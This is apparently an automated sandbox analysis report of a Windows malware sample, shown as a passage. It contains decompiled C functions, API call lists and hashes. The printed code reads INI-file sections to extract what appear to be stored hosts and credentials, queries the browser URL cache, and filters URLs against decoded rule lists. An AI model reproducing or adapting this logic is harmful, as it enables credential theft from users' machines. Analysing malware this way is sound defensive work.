Associated: 00000000.00000002.202769592.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.202789916.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202793327.0000000000425000.00000002.00020000.sdmp Download File

Similarity

API ID: PrivateProfile$String$CombinePath
String ID:
API String ID: 2134968610-0
Opcode ID: 24406da1c64757d6c4459e16a82df0878c00bdf76cb5d4c62d95ca081e0d2e1f
Instruction ID: 237be15bd4d7b03567e2d98d3220d04c3bfe5884ad03ec240c11ef771a8e3e80
Opcode Fuzzy Hash: 24406da1c64757d6c4459e16a82df0878c00bdf76cb5d4c62d95ca081e0d2e1f
Instruction Fuzzy Hash: 1551A372504306ABD710EF65CC45AEBB7E8EFC4714F04082EBA88D7251DB78DD8587AA

Uniqueness

Uniqueness Score: -1.00%

Function 00411897, Relevance: 9.2, APIs: 6, Instructions: 153
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00411897(void* __eflags, char* _a4, struct _GOPHER_FIND_DATAA _a8, void _a12, struct _GOPHER_FIND_DATAA _a16) {
				char _v5;
				char _v12;
				signed int _v16;
				char _v20;
				char _v24;
				long _v28;
				void* __edi;
				void* __esi;
				signed int _t55;
				void* _t58;
				struct _GOPHER_FIND_DATAA _t59;
				intOrPtr _t60;
				struct _GOPHER_FIND_DATAA _t61;
				struct _GOPHER_FIND_DATAA _t62;
				signed int _t71;
				struct _GOPHER_FIND_DATAA _t79;
				struct _GOPHER_FIND_DATAA _t84;
				int _t89;
				struct _GOPHER_FIND_DATAA _t91;
				void* _t96;
				intOrPtr* _t99;
				struct _GOPHER_FIND_DATAA _t103;
				struct _GOPHER_FIND_DATAA _t107;

				_v16 = _v16 | 0xffffffff;
				EnterCriticalSection(0x4230dc);
				_t99 = _a4;
				_t55 = E004110FC( *_t99);
				if(_t55 == 0xffffffff) {
					L33:
					LeaveCriticalSection(0x4230dc);
					return _v16;
				}
				_t58 = _t55 * 0x24 +  *0x4230f4;
				if( *((intOrPtr*)(_t58 + 0x10)) <= 0) {
					goto L33;
				}
				_t96 = _t58;
				if( *((intOrPtr*)(_t96 + 0x10)) != 1 || ( *( *(_t96 + 0xc)) & 0x00000003) == 0) {
					_t59 = _a16;
					__eflags = _t59;
					if(_t59 != 0) {
						 *_t59 =  *_t59 & 0x00000000;
						__eflags =  *_t59;
					}
					__eflags =  *((intOrPtr*)(_t96 + 0x18)) - 0xffffffff;
					if(__eflags != 0) {
						L22:
						_t60 =  *((intOrPtr*)(_t96 + 0x18));
						__eflags = _t60 - 0xffffffff;
						if(_t60 != 0xffffffff) {
							__eflags = _v16 - 0xffffffff;
							if(_v16 == 0xffffffff) {
								_t61 = _t60 -  *(_t96 + 0x1c);
								__eflags = _t61;
								_t103 = _t61;
								if(_t61 != 0) {
									__eflags = _a8;
									if(_a8 == 0) {
										_a12 = E004177A6(0x2000, 0x1000);
									}
									__eflags = _a12 - _t103;
									_t103 =  <  ? _a12 : _t103;
									__eflags = _a8;
									if(_a8 != 0) {
										E0041645D(_a8,  *((intOrPtr*)(_t96 + 0x14)) +  *(_t96 + 0x1c), _t103);
										_t50 = _t96 + 0x1c;
										 *_t50 =  *(_t96 + 0x1c) + _t103;
										__eflags =  *_t50;
									}
								}
								_t62 = _a16;
								__eflags = _t62;
								if(_t62 != 0) {
									 *_t62 = _t103;
								}
								_v16 = 1;
							}
						}
						goto L32;
					}
					LeaveCriticalSection(0x4230dc);
					_v5 = E0041177E( &_v20, __eflags,  *_t99,  *((intOrPtr*)(_t96 + 4)),  &_v12);
					EnterCriticalSection(0x4230dc);
					__eflags = _v5;
					if(_v5 == 0) {
						L21:
						_t37 =  &_v16;
						 *_t37 = _v16 & 0x00000000;
						__eflags =  *_t37;
						SetLastError(0x2ee4);
						goto L22;
					}
					_t105 =  *_a4;
					_t71 = E004110FC( *_a4);
					__eflags = _t71 - 0xffffffff;
					if(_t71 == 0xffffffff) {
						E00416421(_v12);
						goto L21;
					}
					_t96 = _t71 * 0x24 +  *0x4230f4;
					_t101 = E00418557( &_v24, _t105);
					_t79 = E00410561( *((intOrPtr*)(_t96 + 0x10)),  *(_t96 + 0xc), _t75,  &_v12,  &_v20);
					__eflags = _t79;
					if(_t79 == 0) {
						L19:
						E00416421(_t101);
						 *((intOrPtr*)(_t96 + 0x14)) = _v12;
						 *((intOrPtr*)(_t96 + 0x18)) = _v20;
						goto L22;
					}
					_t84 = E00416661(_v24, 0, _t101);
					_a4 = _t84;
					__eflags = _t84;
					if(_t84 == 0) {
						goto L19;
					}
					_v28 = 0x1000;
					_t107 = E004163F1(0x1000);
					__eflags = _t107;
					if(_t107 == 0) {
						L18:
						E00416421(_a4);
						goto L19;
					}
					 *_t107 = 0x50;
					_t89 = GetUrlCacheEntryInfoW(_a4, _t107,  &_v28);
					__eflags = _t89;
					if(_t89 != 0) {
						_t91 =  *(_t107 + 8);
						__eflags = _t91;
						if(_t91 != 0) {
							__eflags =  *_t91;
							if( *_t91 != 0) {
								E0041B5DA(_t91, _v12, _v20);
							}
						}
					}
					E00416421(_t107);
					goto L18;
				} else {
					 *_t99 =  *((intOrPtr*)(_t96 + 0x20));
					L32:
					goto L33;
				}
			}

0x0041189d
0x004118a8
0x004118ae
0x004118b3
0x004118bb
0x00411a66
0x00411a6b
0x00411a77
0x00411a77
0x004118c4
0x004118ce
0x00000000
0x00000000
0x004118d5
0x004118db
0x004118ef
0x004118f2
0x004118f4
0x004118f6
0x004118f6
0x004118f6
0x004118f9
0x004118fd
0x00411a08
0x00411a08
0x00411a0b
0x00411a0e
0x00411a10
0x00411a14
0x00411a16
0x00411a16
0x00411a19
0x00411a1b
0x00411a1d
0x00411a21
0x00411a32
0x00411a32
0x00411a35
0x00411a38
0x00411a3c
0x00411a40
0x00411a4d
0x00411a52
0x00411a52
0x00411a52
0x00411a52
0x00411a40
0x00411a55
0x00411a58
0x00411a5a
0x00411a5c
0x00411a5c
0x00411a5e
0x00411a5e
0x00411a14
0x00000000
0x00411a0e
0x0041190b
0x00411925
0x00411928
0x0041192e
0x00411932
0x004119f9
0x004119f9
0x004119f9
0x004119f9
0x00411a02
0x00000000
0x00411a02
0x0041193b
0x0041193d
0x00411942
0x00411945
0x004119f4
0x00000000
0x004119f4
0x00411958
0x00411962
0x00411970
0x00411975
0x00411977
0x004119dd
0x004119de
0x004119e6
0x004119ec
0x00000000
0x004119ec
0x0041197f
0x00411984
0x00411987
0x00411989
0x00000000
0x00000000
0x00411990
0x00411998
0x0041199a
0x0041199c
0x004119d5
0x004119d8
0x00000000
0x004119d8
0x004119a6
0x004119ac
0x004119b2
0x004119b4
0x004119b6
0x004119b9
0x004119bb
0x004119bd
0x004119c1
0x004119ca
0x004119ca
0x004119c1
0x004119bb
0x004119d0
0x00000000
0x004118e5
0x004118e8
0x00411a65
0x00000000
0x00411a65

APIs

EnterCriticalSection.KERNEL32(004230DC), ref: 004118A8
LeaveCriticalSection.KERNEL32(004230DC), ref: 0041190B
EnterCriticalSection.KERNEL32(004230DC), ref: 00411928
GetUrlCacheEntryInfoW.WININET(?,00000000,000000FF), ref: 004119AC
SetLastError.KERNEL32(00002EE4), ref: 00411A02
LeaveCriticalSection.KERNEL32(004230DC), ref: 00411A6B

Memory Dump Source

Source File: 00000000.00000002.202773445.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.202769592.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.202789916.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202793327.0000000000425000.00000002.00020000.sdmp Download File

Similarity

API ID: CriticalSection$EnterLeave$CacheEntryErrorInfoLast
String ID:
API String ID: 3653105453-0
Opcode ID: 1a12442e00ac2e83faea97f876902e4f296eb016343183dadea7583fa192c143
Instruction ID: f59090dd056eed856a983841abbb2c7333dd38c8591173eb91c5646d08c30ff8
Opcode Fuzzy Hash: 1a12442e00ac2e83faea97f876902e4f296eb016343183dadea7583fa192c143
Instruction Fuzzy Hash: 5151A171A00209EFCF10DFA5D885BDE7BB4EF04365F044156FA20AB2A5D778DA80CB68

Uniqueness

Uniqueness Score: -1.00%

Function 00413B5E, Relevance: 9.1, APIs: 6, Instructions: 148
COMMON

Download Yara Rule

C-Code - Quality: 96%

			E00413B5E(void* __edx, void* __eflags, WCHAR* _a4, intOrPtr _a8) {
				WCHAR* _v8;
				WCHAR* _v12;
				short* _v16;
				WCHAR* _v20;
				short _v32;
				short _v48;
				short _v68;
				short _v88;
				short _v112;
				char _v144;
				void* __edi;
				void* __esi;
				WCHAR* _t40;
				long _t41;
				void* _t48;
				void* _t50;
				void* _t52;
				void* _t54;
				void* _t56;
				WCHAR* _t61;
				WCHAR* _t64;
				void* _t72;
				void* _t76;
				WCHAR* _t83;
				WCHAR* _t84;
				WCHAR* _t86;
				intOrPtr _t96;
				void* _t97;

				_t81 = __edx;
				_t40 = E004163F1(0x1fffe);
				_t86 = _t40;
				_v20 = _t86;
				if(_t86 == 0) {
					return _t40;
				}
				_t41 = GetPrivateProfileStringW(0, 0, 0, _t86, 0xffff, _a4);
				if(_t41 <= 0) {
					L17:
					return E00416421(_t86);
				}
				_t3 = _t41 + 1; // 0x1
				if(E004172D1(_t86, _t3) == 0) {
					goto L17;
				}
				_t83 = E004163F1(0xc08);
				_v12 = _t83;
				if(_t83 == 0) {
					goto L17;
				} else {
					_t5 =  &(_t83[0x2fd]); // 0x5fa
					_v16 = _t5;
					_v8 = _t86;
					_t48 = 0x65;
					E004159A4(_t48,  &_v112);
					_t50 = 0x66;
					E004159A4(_t50,  &_v48);
					_t52 = 0x67;
					E004159A4(_t52,  &_v32);
					_t54 = 0x68;
					E004159A4(_t54,  &_v88);
					_t56 = 0x69;
					E004159A4(_t56,  &_v68);
					goto L6;
					L15:
					_t61 = E0041730D(_v8, 1);
					_v8 = _t61;
					if(_t61 != 0) {
						_t83 = _v12;
						L6:
						if(StrStrIW(_v8,  &_v112) == 0) {
							_t64 = StrStrIW(_v8,  &_v48);
							if(_t64 == 0 && GetPrivateProfileStringW(_v8,  &_v32, _t64, _t83, 0xff, _a4) != 0) {
								_t84 =  &(_t83[0xff]);
								if(GetPrivateProfileStringW(_v8,  &_v88, 0, _t84, 0xff, _a4) != 0) {
									_t26 =  &(_t84[0xff]); // 0x0
									_t94 = _t26;
									if(GetPrivateProfileStringW(_v8,  &_v68, 0, _t26, 0xff, _a4) != 0 && E004139F3(_t81, _t94) > 0) {
										_t95 =  &_v144;
										_t72 = 0x56;
										E004159A4(_t72,  &_v144);
										_push(_v12);
										_t30 =  &(_t84[0xff]); // 0x0
										_push(_t84);
										_t85 = _v16;
										_t81 = 0x307;
										_t76 = E00417114(_t95, 0x307, _v16, _t95);
										_t97 = _t97 + 0x10;
										if(_t76 > 0) {
											_t96 = _a8;
											if(E00416815(_t76, _t96, _t85) != 0) {
												 *((intOrPtr*)(_t96 + 4)) =  *((intOrPtr*)(_t96 + 4)) + 1;
											}
										}
									}
								}
							}
						}
						goto L15;
					} else {
						E00416421(_v12);
						_t86 = _v20;
						goto L17;
					}
				}
			}

0x00413b5e
0x00413b6f
0x00413b74
0x00413b78
0x00413b7d
0x00413cfe
0x00413cfe
0x00413b95
0x00413b99
0x00413cf4
0x00000000
0x00413cf5
0x00413b9f
0x00413bab
0x00000000
0x00000000
0x00413bbb
0x00413bbd
0x00413bc2
0x00000000
0x00413bc8
0x00413bc8
0x00413bd0
0x00413bd3
0x00413bd9
0x00413bda
0x00413be4
0x00413be5
0x00413bef
0x00413bf0
0x00413bfa
0x00413bfb
0x00413c05
0x00413c06
0x00413c0b
0x00413cd4
0x00413cd9
0x00413cde
0x00413ce3
0x00413c0d
0x00413c10
0x00413c21
0x00413c2e
0x00413c32
0x00413c57
0x00413c6c
0x00413c75
0x00413c75
0x00413c86
0x00413c94
0x00413c9a
0x00413c9b
0x00413ca0
0x00413ca3
0x00413caa
0x00413cab
0x00413cb1
0x00413cb6
0x00413cbb
0x00413cc0
0x00413cc2
0x00413ccf
0x00413cd1
0x00413cd1
0x00413ccf
0x00413cc0
0x00413c86
0x00413c6c
0x00413c32
0x00000000
0x00413ce9
0x00413cec
0x00413cf1
0x00000000
0x00413cf1
0x00413ce3

APIs

GetPrivateProfileStringW.KERNEL32 ref: 00413B95

Part of subcall function 004163F1: HeapAlloc.KERNEL32(00000008,-00000004,00417BBF,00000000,?,?,?,004060A9,00000000,00406583,?,?,00000000), ref: 00416402

StrStrIW.SHLWAPI(00000001,?), ref: 00413C1D
StrStrIW.SHLWAPI(00000001,?), ref: 00413C2E
GetPrivateProfileStringW.KERNEL32 ref: 00413C4A
GetPrivateProfileStringW.KERNEL32 ref: 00413C68
GetPrivateProfileStringW.KERNEL32 ref: 00413C82

Memory Dump Source

Source File: 00000000.00000002.202773445.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.202769592.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.202789916.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202793327.0000000000425000.00000002.00020000.sdmp Download File

Similarity

API ID: PrivateProfileString$AllocHeap
String ID:
API String ID: 2479592106-0
Opcode ID: 12972e4f2a557715c626d179d363f3ee32402e6d8786d9dd5ad551cc323cbef3
Instruction ID: d0b461bd5f32aa60f1d19cd00a05bf9b9cc0b8ba44053562f107316629f7a24a
Opcode Fuzzy Hash: 12972e4f2a557715c626d179d363f3ee32402e6d8786d9dd5ad551cc323cbef3
Instruction Fuzzy Hash: 9641943290011AFADF109BA5CD01EEFFB79EF44718F114026B904F7251DB38AE8597A9

Uniqueness

Uniqueness Score: -1.00%

Function 004100E7, Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 395
networkCOMMON

Download Yara Rule

C-Code - Quality: 90%

			E004100E7(intOrPtr _a4) {
				char _v9;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v32;
				char _v36;
				char _v60;
				char _v72;
				signed int _v76;
				char* _v80;
				void* _v96;
				intOrPtr _v148;
				void* _v160;
				char _v168;
				char _v272;
				char _v536;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t128;
				intOrPtr* _t129;
				char* _t130;
				void* _t137;
				void* _t140;
				void* _t144;
				void* _t152;
				void* _t154;
				char* _t156;
				void* _t161;
				void* _t163;
				void* _t164;
				void* _t167;
				void* _t172;
				intOrPtr _t174;
				intOrPtr* _t176;
				void* _t177;
				void* _t182;
				intOrPtr _t186;
				intOrPtr _t187;
				signed int _t189;
				void* _t194;
				void* _t197;
				void* _t198;
				void* _t199;
				int _t204;
				void* _t207;
				signed int _t210;
				void* _t214;
				signed int _t217;
				signed int _t218;
				void* _t219;
				void* _t224;
				char* _t227;
				intOrPtr _t228;
				char* _t233;
				char* _t236;
				intOrPtr _t238;
				signed int _t239;
				intOrPtr _t240;
				void* _t244;
				void* _t247;
				void* _t285;

				_t217 = 0;
				_v16 = 0;
				_v9 = 0xff;
				EnterCriticalSection(0x4230bc);
				_t225 =  *0x4230d8;
				if( *0x4230d8 == 0 ||  *0x4230d4 == 0) {
					_t240 = _a4;
				} else {
					_t240 = _a4;
					_t230 = 0;
					if(E0040F81C(_t225, 0,  *(_t240 + 8),  *(_t240 + 0xc)) != 0) {
						_t210 = E0040D72B();
						_v20 = _t210;
						if(_t210 != 0) {
							_t214 = E0040F8D6(0, 4,  &_v20,  *0x4230d4);
							_push(_v20);
							if(_t214 == 0) {
								E00416421();
							}
							E0040D796(_t225);
						}
						E00416421( *0x4230d4);
						E00416421( *0x4230d8);
						 *0x4230d4 = _t217;
						 *0x4230d8 = _t217;
					}
				}
				LeaveCriticalSection(0x4230bc);
				_t128 =  *((intOrPtr*)(_t240 + 0x40));
				_t254 = _t128 - _t217;
				if(_t128 == _t217) {
					L38:
					if((_v16 & 0x00000001) == 0) {
						_t187 =  *((intOrPtr*)(_t240 + 0x44));
						_t272 = _t187 - _t217;
						if(_t187 != _t217 && E0040FAD7(_t225, _t230, _t272, 3, _t187,  *(_t240 + 8),  *(_t240 + 0xc), _t217) != 0) {
							_v16 = _v16 | 0x00000001;
						}
					}
					if( *(_t240 + 0x20) >= 0x21) {
						_t182 = 0x10;
						E0041596E(_t182,  &_v72);
						_t238 =  *((intOrPtr*)(_t240 + 0x1c));
						if(E00416492( &_v72, _t238, 0x21) == 0) {
							_t186 =  *((intOrPtr*)(_t238 + 0x21));
							if(_t186 == 0x3b || _t186 == 0) {
								_v16 = _v16 | 0x00000010;
							}
						}
					}
					_t129 =  *((intOrPtr*)(_t240 + 0x2c));
					_v24 = _t217;
					if(_t129 == _t217 ||  *_t129 == _t217) {
						L52:
						_t130 =  *((intOrPtr*)(_t240 + 0x34));
						__eflags = _t130 - _t217;
						if(_t130 == _t217) {
							goto L60;
						}
						__eflags =  *_t130;
						if( *_t130 == 0) {
							goto L60;
						}
						_t167 = 0x12;
						E004159A4(_t167,  &_v168);
						_t172 = E0041718F( &_v24,  &_v168,  *((intOrPtr*)(_a4 + 0x34)));
						_t247 = _t247 + 0xc;
						goto L55;
					} else {
						_t176 =  *((intOrPtr*)(_t240 + 0x30));
						if(_t176 == _t217 ||  *_t176 == _t217) {
							goto L52;
						} else {
							_t177 = 0x11;
							E004159A4(_t177,  &_v272);
							_push( *((intOrPtr*)(_a4 + 0x30)));
							_t172 = E0041718F( &_v24,  &_v272,  *((intOrPtr*)(_a4 + 0x2c)));
							_t247 = _t247 + 0x10;
							L55:
							if(_t172 > _t217) {
								_t174 = E004177D0(_v24, _t172 + _t172);
								_t285 =  *0x422fec - _t174; // 0x0
								if(_t285 != 0) {
									_t64 =  &_v16;
									 *_t64 = _v16 | 0x00000020;
									__eflags =  *_t64;
									 *0x422fec = _t174;
								} else {
									E00416421(_v24);
									_v24 = _t217;
								}
							}
							_t240 = _a4;
							L60:
							if(_v9 != 0xff) {
								__eflags = _v9 - 1;
								if(_v9 != 1) {
									L67:
									if((_v16 & 0x00000008) == 0) {
										L93:
										E00416421(_v24);
										_t218 = _v16;
										if((_t218 & 0x00000001) == 0) {
											if(E0040FB3F(_t230, _t240) != 0) {
												_t218 = _t218 | 0x00000002;
											}
											if((_t218 & 0x00000010) != 0 && E0040FEF9(_t240, _t230) != 0) {
												_t218 = _t218 | 0x00000004;
											}
										}
										return _t218;
									}
									_t136 =  *(_t240 + 0x28);
									_t219 = 0;
									if( *(_t240 + 0x28) != 0) {
										__eflags = _v16 & 0x00000010;
										if((_v16 & 0x00000010) == 0) {
											__eflags =  *(_t240 + 0x20);
											if( *(_t240 + 0x20) != 0) {
												L92:
												_v16 = _v16 & 0xfffffff7;
												goto L93;
											}
											_t233 =  &_v36;
											_t137 = 0xc;
											E0041596E(_t137, _t233);
											_push(_t233);
											_push(9);
											L81:
											_pop(_t140);
											_v20 = E0041687F(_t140);
											L82:
											if(_v20 == 0) {
												goto L92;
											}
											E0041612D( &_v32);
											_t144 = E00416661( *(_t240 + 0xc), 0,  *(_t240 + 8));
											_t235 = _t144;
											if(_t144 != 0) {
												_t230 = 0x3c;
												E004164D4( &_v160,  &_v160, 0, _t230);
												_v160 = _t230;
												if(InternetCrackUrlA( *(_t240 + 8),  *(_t240 + 0xc), 0,  &_v160) == 1) {
													_t152 = 0xa;
													E004159A4(_t152,  &_v272);
													_t154 = 0xd;
													E004159A4(_t154,  &_v60);
													_t227 =  *(_a4 + 0x10);
													_t156 = 0x4036b4;
													_t230 =  ==  ? 0x4036b4 : _v24;
													_t244 =  ==  ? 0x4036b4 : _v32;
													if(_t227 == 0) {
														_t227 = "-";
													}
													if((_v16 & 0x00000001) != 0) {
														_t156 =  &_v60;
													}
													_push(_v20);
													_push(_t230);
													_push(_t244);
													_push(_t227);
													_push(_t156);
													_t161 = E00405851(_t227, _t230, (0 | _v148 == 0x00000004) + 0xb, (0 | _v148 == 0x00000004) + 0xb, _t235, 0,  &_v272, _t235);
													_t240 = _a4;
													_t219 = _t161;
												}
												E00416421(_t235);
											}
											E00416421(_v32);
											E00416421(_v20);
											if(_t219 != 0) {
												goto L93;
											} else {
												goto L92;
											}
										}
										_t230 = E0041687F(_t136,  *((intOrPtr*)(_t240 + 0x24)));
										_v20 = _t230;
										__eflags = _t230;
										if(_t230 == 0) {
											goto L92;
										}
										_t163 = 0;
										__eflags =  *(_t240 + 0x28);
										if( *(_t240 + 0x28) <= 0) {
											goto L82;
										} else {
											goto L73;
										}
										do {
											L73:
											_t228 =  *((intOrPtr*)(_t163 + _t230));
											__eflags = _t228 - 0x26;
											if(_t228 != 0x26) {
												__eflags = _t228 - 0x2b;
												if(_t228 == 0x2b) {
													 *((char*)(_t163 + _t230)) = 0x20;
												}
											} else {
												 *((char*)(_t163 + _t230)) = 0xa;
											}
											_t163 = _t163 + 1;
											__eflags = _t163 -  *(_t240 + 0x28);
										} while (_t163 <  *(_t240 + 0x28));
										goto L82;
									}
									_t236 =  &_v36;
									_t164 = 0xb;
									E0041596E(_t164, _t236);
									_push(_t236);
									_push(7);
									goto L81;
								}
								L66:
								_v16 = _v16 | 0x00000008;
								goto L67;
							}
							if( *((char*)(_t240 + 0x18)) != 1 ||  *(_t240 + 0x28) <= _t217) {
								if((_v16 & 0x00000020) == 0) {
									goto L67;
								}
							}
							goto L66;
						}
					}
				}
				_t189 = E0041BF9B( &_v32, _t230, _t254, _t128, 0x4e25, 0x10000000);
				_t225 = _v32;
				_v20 = _t189;
				if(E004172B3(_t189, _v32) == 0) {
					L37:
					E00416421(_v20);
					_t217 = 0;
					goto L38;
				} else {
					_t239 = _v20;
					do {
						_t225 = _t239 + 1;
						if( *_t225 == 0) {
							goto L36;
						}
						_t194 =  *_t239;
						if(_t194 == 0x21) {
							L22:
							_t239 = _t225;
							L23:
							_t230 = 0;
							_t225 = _t239;
							if(E0040F81C(_t239, 0,  *(_t240 + 8),  *(_t240 + 0xc)) == 0) {
								goto L36;
							}
							_t197 = _t224;
							if(_t197 == 0) {
								_v9 = 0;
								L35:
								if(_t224 != 2) {
									goto L37;
								}
								goto L36;
							}
							_t198 = _t197 - 1;
							if(_t198 == 0) {
								L30:
								_v9 = 1;
								goto L35;
							}
							_t199 = _t198 - 1;
							if(_t199 == 0) {
								_t230 = 0x3c;
								E004164D4( &_v96,  &_v96, 0, 0);
								_v80 =  &_v536;
								_v96 = 0;
								_v76 = 0x103;
								_t204 = InternetCrackUrlA( *(_t240 + 8),  *(_t240 + 0xc), 0,  &_v96);
								__eflags = _t204 - 1;
								if(_t204 == 1) {
									__eflags = _v76;
									if(_v76 > 0) {
										E004160E7( &_v536);
									}
								}
								goto L35;
							}
							_t207 = _t199 - 1;
							if(_t207 == 0 || _t207 == 1) {
								_v16 = _v16 | 0x00000001;
								goto L30;
							} else {
								goto L35;
							}
						}
						if(_t194 == 0x2d) {
							goto L22;
						}
						if(_t194 == 0x40) {
							goto L22;
						}
						if(_t194 == 0x5e) {
							_t224 = 4;
							goto L22;
						} else {
							_t224 = 0;
							goto L23;
						}
						L36:
						_t239 = E004172F1(_t239, 1);
					} while (_t239 != 0);
					goto L37;
				}
			}

0x004100f8
0x004100fb
0x004100fe
0x00410102
0x00410108
0x00410110
0x00410181
0x0041011a
0x0041011a
0x00410120
0x0041012c
0x0041012e
0x00410133
0x00410138
0x00410146
0x0041014b
0x00410150
0x00410152
0x00410157
0x00410158
0x00410158
0x00410163
0x0041016e
0x00410173
0x00410179
0x00410179
0x0041012c
0x00410185
0x0041018b
0x0041018e
0x00410190
0x00410295
0x00410299
0x0041029b
0x0041029e
0x004102a0
0x004102b5
0x004102b5
0x004102a0
0x004102bd
0x004102c4
0x004102c5
0x004102ca
0x004102db
0x004102dd
0x004102e2
0x004102e8
0x004102e8
0x004102e2
0x004102db
0x004102ec
0x004102ef
0x004102f4
0x0041032f
0x0041032f
0x00410332
0x00410334
0x00000000
0x00000000
0x00410336
0x00410339
0x00000000
0x00000000
0x00410343
0x00410344
0x00410356
0x0041035b
0x00000000
0x004102fb
0x004102fb
0x00410300
0x00000000
0x00410307
0x0041030f
0x00410310
0x00410318
0x00410325
0x0041032a
0x0041035e
0x00410360
0x00410368
0x0041036d
0x00410373
0x00410382
0x00410382
0x00410382
0x00410386
0x00410375
0x00410378
0x0041037d
0x0041037d
0x00410373
0x0041038b
0x0041038e
0x00410392
0x004103a7
0x004103ab
0x004103b1
0x004103b5
0x00410528
0x0041052b
0x00410530
0x00410536
0x00410540
0x00410542
0x00410542
0x00410548
0x00410555
0x00410555
0x00410548
0x0041055e
0x0041055e
0x004103bb
0x004103be
0x004103c2
0x004103d6
0x004103da
0x00410417
0x0041041b
0x00410524
0x00410524
0x00000000
0x00410524
0x00410423
0x00410426
0x00410427
0x0041042e
0x0041042f
0x00410431
0x00410431
0x00410437
0x0041043a
0x0041043e
0x00000000
0x00000000
0x00410447
0x00410454
0x00410459
0x0041045d
0x00410465
0x00410470
0x00410481
0x00410493
0x0041049d
0x0041049e
0x004104a8
0x004104a9
0x004104b7
0x004104bc
0x004104c1
0x004104c6
0x004104cb
0x004104cd
0x004104cd
0x004104d6
0x004104d8
0x004104d8
0x004104db
0x004104de
0x004104df
0x004104e0
0x004104e1
0x004104fd
0x00410502
0x00410508
0x00410508
0x0041050b
0x0041050b
0x00410513
0x0041051b
0x00410522
0x00000000
0x00000000
0x00000000
0x00000000
0x00410522
0x004103e4
0x004103e6
0x004103e9
0x004103eb
0x00000000
0x00000000
0x004103f1
0x004103f3
0x004103f6
0x00000000
0x00000000
0x00000000
0x00000000
0x004103f8
0x004103f8
0x004103f8
0x004103fb
0x004103fe
0x00410406
0x00410409
0x0041040b
0x0041040b
0x00410400
0x00410400
0x00410400
0x0041040f
0x00410410
0x00410410
0x00000000
0x00410415
0x004103c6
0x004103c9
0x004103ca
0x004103d1
0x004103d2
0x00000000
0x004103d2
0x004103ad
0x004103ad
0x00000000
0x004103ad
0x00410398
0x004103a3
0x00000000
0x00000000
0x004103a5
0x00000000
0x00410398
0x00410300
0x004102f4
0x004101a4
0x004101a9
0x004101ac
0x004101b6
0x0041028b
0x0041028e
0x00410293
0x00000000
0x004101bc
0x004101bc
0x004101bf
0x004101bf
0x004101c5
0x00000000
0x00000000
0x004101cb
0x004101cf
0x004101ef
0x004101ef
0x004101f1
0x004101f4
0x004101f9
0x00410202
0x00000000
0x00000000
0x00410207
0x0041020a
0x0041026f
0x00410273
0x00410276
0x00000000
0x00000000
0x00000000
0x00410276
0x0041020c
0x0041020d
0x0041021c
0x0041021c
0x00000000
0x0041021c
0x0041020f
0x00410210
0x00410224
0x0041022c
0x00410237
0x00410243
0x00410249
0x00410250
0x00410256
0x00410259
0x0041025b
0x0041025f
0x00410268
0x00410268
0x0041025f
0x00000000
0x00410259
0x00410212
0x00410213
0x00410218
0x00000000
0x00000000
0x00000000
0x00000000
0x00410213
0x004101d3
0x00000000
0x004101e9
0x004101d7
0x00000000
0x004101e5
0x004101db
0x004101e1
0x00000000
0x004101dd
0x004101dd
0x00000000
0x004101dd
0x00410278
0x00410281
0x00410283
0x00000000
0x004101bf

APIs

EnterCriticalSection.KERNEL32(004230BC,-00422FC8,00000000,00422FAC), ref: 00410102
LeaveCriticalSection.KERNEL32(004230BC), ref: 00410185
InternetCrackUrlA.WININET(00000000,00000000,00000000,?), ref: 00410250
InternetCrackUrlA.WININET(00000000,00000000,00000000,?), ref: 0041048A

Part of subcall function 0040D72B: CreateMutexW.KERNEL32(00422978,00000000,00423058,?,00000001,?,0040B693), ref: 0040D753

Part of subcall function 00416421: HeapFree.KERNEL32(00000000,00000000,00417C18,00000000,?,?,?,004060A9,00000000,00406583), ref: 00416434

Strings

, xrefs: 0041039F

Memory Dump Source

Source File: 00000000.00000002.202773445.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.202769592.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.202789916.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202793327.0000000000425000.00000002.00020000.sdmp Download File

Similarity

API ID: CrackCriticalInternetSection$CreateEnterFreeHeapLeaveMutex
String ID:
API String ID: 4018265435-3916222277
Opcode ID: b0e94767b2febf08fef8d3adb43d3215a60532055132960903f0efdece1733c0
Instruction ID: 6118c3ba7e39afd5436057fb4ce6b68c8791c97e0caaf4aa950c58bda734d9e1
Opcode Fuzzy Hash: b0e94767b2febf08fef8d3adb43d3215a60532055132960903f0efdece1733c0
Instruction Fuzzy Hash: 2FD1F031E00209AFDF219BA1C845BEF7BB6AF04304F14846BE955A7291C7BD9DC5CB19

Uniqueness

Uniqueness Score: -1.00%

Function 0040F10A, Relevance: 9.1, APIs: 6, Instructions: 78
COMMON

Download Yara Rule

C-Code - Quality: 76%

			E0040F10A(void* __ebx, void* __ecx, void* __eflags) {
				char _v1168;
				char _v1668;
				char _v1680;
				short _v1688;
				char _v2192;
				short _v2208;
				char _v2720;
				char _v2728;
				char _v2992;
				char _v3072;
				void* __edi;
				void* __esi;
				void* _t34;
				WCHAR* _t50;
				WCHAR* _t51;
				WCHAR* _t52;
				void* _t56;
				void* _t65;

				_t65 = __eflags;
				_t46 = __ecx;
				_push(_t56);
				_t50 =  &_v1668;
				E00406AB8(__ecx, _t50, _t56, 1);
				PathRemoveFileSpecW(_t50);
				_t51 =  &_v2192;
				E00406AB8(_t46, _t51, PathRemoveFileSpecW, 2);
				PathRemoveFileSpecW(_t51);
				 *0x422940 =  *0x422940 | 0x00000002;
				_push(0);
				E0040E698();
				E00415B35(_t46, _t65);
				E0041BA9D( &_v1680, _t65);
				E0041BA9D(_t51, _t65);
				_t52 =  &_v2720;
				E00406AB8(_t51, _t52, PathRemoveFileSpecW, 3);
